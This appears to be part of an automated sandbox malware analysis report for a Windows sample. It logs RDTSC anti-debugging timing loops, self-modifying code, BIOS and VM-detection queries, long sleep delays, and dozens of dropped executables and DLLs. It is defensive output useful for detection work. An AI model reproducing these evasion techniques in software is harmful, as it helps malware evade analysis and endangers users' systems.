                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50482 second address: 4A504A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test bl, 00000007h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edi 0x00000011 mov bx, 73CCh 0x00000015 popad 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A504A1 second address: 4A504A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A504A7 second address: 4A504AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A407B6 second address: 4A4088D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5E60CAC690h 0x00000011 sub eax, 1B598D88h 0x00000017 jmp 00007F5E60CAC68Bh 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F5E60CAC68Fh 0x00000026 xor esi, 69ED11CEh 0x0000002c jmp 00007F5E60CAC699h 0x00000031 popfd 0x00000032 push eax 0x00000033 pushfd 0x00000034 jmp 00007F5E60CAC697h 0x00000039 sbb cx, 1FDEh 0x0000003e jmp 00007F5E60CAC699h 0x00000043 popfd 0x00000044 pop eax 0x00000045 popad 0x00000046 xchg eax, ebp 0x00000047 pushad 0x00000048 push edi 0x00000049 push ecx 0x0000004a pop ebx 0x0000004b pop eax 0x0000004c mov bl, 27h 0x0000004e popad 0x0000004f mov ebp, esp 0x00000051 pushad 0x00000052 mov ebx, ecx 0x00000054 jmp 00007F5E60CAC696h 0x00000059 popad 0x0000005a and esp, FFFFFFF8h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F5E60CAC68Ah 0x00000066 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A4088D second address: 4A40891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40891 second address: 4A40897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40897 second address: 4A4089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A4089D second address: 4A408A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A408A1 second address: 4A408AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A408AE second address: 4A408B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A408B4 second address: 4A408C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 mov ecx, 343E1929h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A408C0 second address: 4A4098B instructions: 0x00000000 rdtsc 0x00000002 mov eax, 51F61EE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F5E60CAC691h 0x00000011 pushfd 0x00000012 jmp 00007F5E60CAC690h 0x00000017 or eax, 44A62E28h 0x0000001d jmp 00007F5E60CAC68Bh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 jmp 00007F5E60CAC696h 0x0000002a xchg eax, esi 0x0000002b jmp 00007F5E60CAC690h 0x00000030 push eax 0x00000031 pushad 0x00000032 call 00007F5E60CAC691h 0x00000037 mov ebx, ecx 0x00000039 pop esi 0x0000003a push ebx 0x0000003b jmp 00007F5E60CAC698h 0x00000040 pop ecx 0x00000041 popad 0x00000042 xchg eax, esi 0x00000043 jmp 00007F5E60CAC691h 0x00000048 mov esi, dword ptr [ebp+08h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F5E60CAC698h 0x00000054 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A4098B second address: 4A40991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40991 second address: 4A409F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F5E60CAC691h 0x00000010 test esi, esi 0x00000012 pushad 0x00000013 call 00007F5E60CAC68Ch 0x00000018 pushfd 0x00000019 jmp 00007F5E60CAC692h 0x0000001e add eax, 5FC5FF98h 0x00000024 jmp 00007F5E60CAC68Bh 0x00000029 popfd 0x0000002a pop esi 0x0000002b push eax 0x0000002c push edx 0x0000002d movsx ebx, ax 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A409F0 second address: 4A40A28 instructions: 0x00000000 rdtsc 0x00000002 call 00007F5E60BA1660h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b je 00007F5ED3076FDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ebx, eax 0x00000016 jmp 00007F5E60BA1666h 0x0000001b popad 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40A28 second address: 4A40A73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F5E60CAC696h 0x00000015 mov ecx, esi 0x00000017 pushad 0x00000018 jmp 00007F5E60CAC68Eh 0x0000001d mov ch, 34h 0x0000001f popad 0x00000020 je 00007F5ED3181FC1h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40A73 second address: 4A40A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Tries to evade debugger and weak emulator (self modifying code)
                                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 475913 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4A3E40 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2CEB46 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4894DE instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 50A74D instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 8A5913 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 8D3E40 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 6FEB46 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 8B94DE instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 93A74D instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeSpecial instruction interceptor: First address: BFDE39 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeSpecial instruction interceptor: First address: C8F426 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04AC069B rdtsc 0_2_04AC069B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1368Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1030Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1109Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 977Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1320Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6519
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7775
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5929
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 461
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4162
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1096
                                Source: C:\Users\Public\Netstat\FuturreApp.exeWindow / User API: threadDelayed 8842
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3897
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 771
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1074
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeDropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017915001\712b285aaa.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017921001\85070a414c.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017906001\3b81e6737d.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017920001\194df6b68b.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[3].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017913001\97d4b1071f.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[3].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeDropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_ssl.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_sqlite3.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[4].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017903001\cb947ba4b8.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017907001\90ddd682ad.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017905001\4dd01d90fc.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017911001\67fbb282d1.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_queue.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[3].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017917001\7423465717.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017910001\fde98a8d0b.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[5].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017912001\f7b3852b06.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017904001\97bf9e137e.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeDropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017901001\a4439a2887.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017916001\UZAj8wc.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[4].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017908001\2c36247645.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\python310.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI51602\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-17338
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeAPI coverage: 5.9 %
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6172Thread sleep time: -44022s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6580Thread sleep count: 1368 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6580Thread sleep time: -2737368s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6392Thread sleep count: 1030 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6392Thread sleep time: -2061030s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6508Thread sleep count: 207 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6508Thread sleep time: -6210000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5968Thread sleep count: 1109 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5968Thread sleep time: -2219109s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6552Thread sleep count: 977 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6552Thread sleep time: -1954977s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6348Thread sleep count: 1320 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6348Thread sleep time: -2641320s >= -30000sJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep count: 6519 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep count: 177 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6120Thread sleep time: -6456360425798339s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep count: 7775 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep count: 54 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180Thread sleep time: -3689348814741908s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5436Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep count: 5929 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180Thread sleep time: -3689348814741908s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep count: 461 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208Thread sleep time: -4611686018427385s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4024Thread sleep count: 4162 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep time: -11068046444225724s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3596Thread sleep count: 1096 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe TID: 7248Thread sleep time: -300000s >= -30000s
                                Source: C:\Users\Public\Netstat\FuturreApp.exe TID: 6408Thread sleep time: -884200s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep count: 1074 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 252 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5352Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe TID: 7252Thread sleep time: -240000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe TID: 7524Thread sleep time: -180000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe TID: 7148Thread sleep time: -30000s >= -30000s
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\Public\Netstat\FuturreApp.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
